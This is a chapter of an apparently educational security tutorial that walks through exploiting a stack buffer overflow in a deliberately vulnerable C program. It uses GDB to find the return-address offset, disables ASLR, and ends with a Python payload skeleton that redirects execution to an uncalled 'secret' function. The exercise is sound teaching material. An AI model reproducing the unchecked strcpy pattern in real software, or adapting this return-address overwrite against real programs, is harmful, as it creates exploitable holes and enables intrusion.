Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

Secret Function

Here is a simple C program that takes an argument and print its hexadecimal value in the console. Our goal is to trigger and exploit a buffer overflow.

#include <stdint.h>
#include <stdio.h>
#include <string.h>

static void print_hex_u4(uint8_t n) {
    char c;

    n &= 0x0f; // Truncate to 4 bits to be sure.
    c = n < 0x0a
        ? '0' + n
        : 'a' + (n - 0x0a);
    putchar(c);
}

static void print_hex_u8(uint8_t n) {
    print_hex_u4(n >> 4); // Print the 4 most significant bits.
    print_hex_u4(n); // Print the 4 least significant bits.
}

static void print_hex(uint8_t* data) {
    uint8_t data_copy[10];
    uint8_t* data_cursor;

    strcpy((char*)data_copy, (char*)data);
    data_cursor = &data_copy[0];
    while (*data_cursor != '\0') {
        print_hex_u8(*data_cursor);
        data_cursor++;
    }
    putchar('\n');
}

static void secret(void) {
    // This function is never called, isn't it?
    puts("What? How did you get here?!");
}

int main(int argc, char** argv) {
    if (argc != 2) {
        puts("Please, provide one argument.");
        return -1;
    }
    print_hex((uint8_t*)argv[1]);
    return 0;
}

For an educational purpose, and to make our task easier, we’ll need to invoke gcc with special arguments. Copy the source code into a C file (“tp2.c” for instance), then run:

$ gcc -g -m32 -fno-stack-protector tp2.c -o tp2

“What?”, or “Why?”, you may ask.

Well, -g means “compile with debug symbols”, -m32 means “compile as a 32-bits program instead of 64-bits”, -fno-stack-protector means “trust me, I don’t need stack security”.

The reason is modern CPUs and OSes have multiple defenses against memory vulnerabilities. To learn about buffer overflows, we deactivate them. Otherwise the learning curve would be way to harsh. But worry not, we’ll talk about that later on.

If everything went smooth, you should see a “tp2” program next to the “tp2.c” source code. Try to run it:

$ ./tp2 "Hello"
48656c6c6f

It is indeed a hex dump of the ASCII string “Hello”:

$ echo -n "Hello" | hexdump -C
00000000  48 65 6c 6c 6f                                    |Hello|
00000005

Where is the Bug?

First, inspect the code and try to figure out where we could trigger a buffer overflow.

Tip

Click to get a hint.

Don’t know where to look? A buffer overflow needs, well, a buffer. 😉

Crash It

Now that you identified the issue, try to run the program in a way that crashes it. If you see a segmentation fault, you win.

Run the Secret Function

You probably noticed by now, but there’s a function called secret that’s never called. However it is compiled and linked into the program. By exploiting the buffer overflow, we can jump back to it. Let’s do just that!

It’s time to spin up GDB:

$ gdb ./tp2
GNU gdb (GDB) 17.1
Copyright (C) 2025 Free Software Foundation, Inc.
  ...
Reading symbols from ./tp2...
(gdb) run "Hello"
Starting program: /home/pierre/tp2 "Hello"
  ...
48656c6c6f
[Inferior 1 (process 38074) exited normally]
(gdb) info address secret
Symbol "secret" is a function at address 0x5655628d.

See the last line? That’s the function address we’re targetting.

Warning

The address may be different on your machine! It could vary based on your OS/distribution, GCC’s version, architecture, etc.

Tip

Click to get a first hint.

We’re trying to override the return address of secret by injecting data at the correct place. Thus, we need to know where the return address lands in relation to data_copy. There are two approaches.

First Approach One simple (and fun) way to do it is just throw something and see what happens:

$ gdb ./tp2
  ...
(gdb) run AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJMMMMNNNN
Starting program: /home/pierre/tp2 AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJMMMMNNNN
  ...
41414141424242424343bcd6ffff444445454545464646464747474748484848494949494a4a4a4a4d4d4d4d4e4e4e4e

Program received signal SIGSEGV, Segmentation fault.
0x48484747 in ?? ()
(gdb) print $eip
$1 = (void (*)()) 0x48484747

⇒ The last line is useful… Remember that x86 is little-endian.

Second Approach Another way to do it, if we have access to debugging symbols, is to ask GDB:

$ gdb ./tp2
  ...
(gdb) break print_hex
Breakpoint 1 at 0x123d: file tp2.c, line 24.
(gdb) run abcd
Starting program: /home/pierre/tp2 abcd
  ...
Breakpoint 1, print_hex (data=0xffffd9ba "abcd") at tp2.c:24
24	    strcpy((char*)data_copy, (char*)data);
(gdb) info frame
Stack level 0, frame at 0xffffd700:
 eip = 0x5655623d in print_hex (tp2.c:24); saved eip = 0x56556305
 called by frame at 0xffffd730
 source language c.
 Arglist at 0xffffd6f8, args: data=0xffffd9ba "abcd"
 Locals at 0xffffd6f8, Previous frame's sp is 0xffffd700
 Saved registers:
  ebx at 0xffffd6f4, ebp at 0xffffd6f8, eip at 0xffffd6fc
(gdb) print &data_copy
$2 = (uint8_t (*)[10]) 0xffffd6e2

⇒ Try to identify useful information in the logs below…

Tip

Click to get a second hint.

Depending on the approach you used in the previous hint, you can compute the numbers of bytes you must input to override the return address. Here’s how:

First Approach The EIP register is the address of the instuction we’re currently executing. Notice the value of the EIP register, 0x48484747. x86 is a little-endian architecture, meaning we injected four bytes, 0x47 0x47 0x48 0x48, in that order, in the return address. Then, when leaving the function, these bytes got into EIP and we jumped at an invalid address, triggering a segmentation fault.

⇒ How do these bytes relate with the data we threw? What is 0x47 or 0x48 in ASCII? And how can this help us, now?

Second Approach Look attentively: info frame told us that EIP is stored at 0xffffd6fc, that’s the address of the return address we want to modify; print &data_copy told us that the data_copy buffer starts at 0xffffd6e2.

⇒ The question is, how many bytes should write into data_copy until we get to the return address?

Tip

Click to get a third hint.

Still stuck? Here’s one last advice:

First Approach Notice that, in ASCII, 0x47 is G, and 0x48 is H. So, the little-endian 32-bits integer 0x48484747 corresponds to the string “GGHH” in memory. We must inject something like AAAABBBBCCCCDDDDEEEEFFFFGG<secret-address>.

Second Approach Just substract the two addresses: 0xffffd6fc - 0xffffd6e2 = 26. We must inject something like <26-bytes><secret-address>.

Whatever the approach you took, you now have to write a working payload, in a file for instance. Once you have it, inject it using bash:

$ setarch -R ./tp2 "$(cat payload.bin)"

The setarch -R is important to disable Address Space Layout Randomization (ASLR).

Tip

Click to get a fourth hint.

Using Python is an easy and familiar way to generate our payload:

secret_address = bytes.fromhex("?")  # What do you put here?
with open("payload.bin", "wb") as file:
    file.write(b"A" * 26 + secret_address)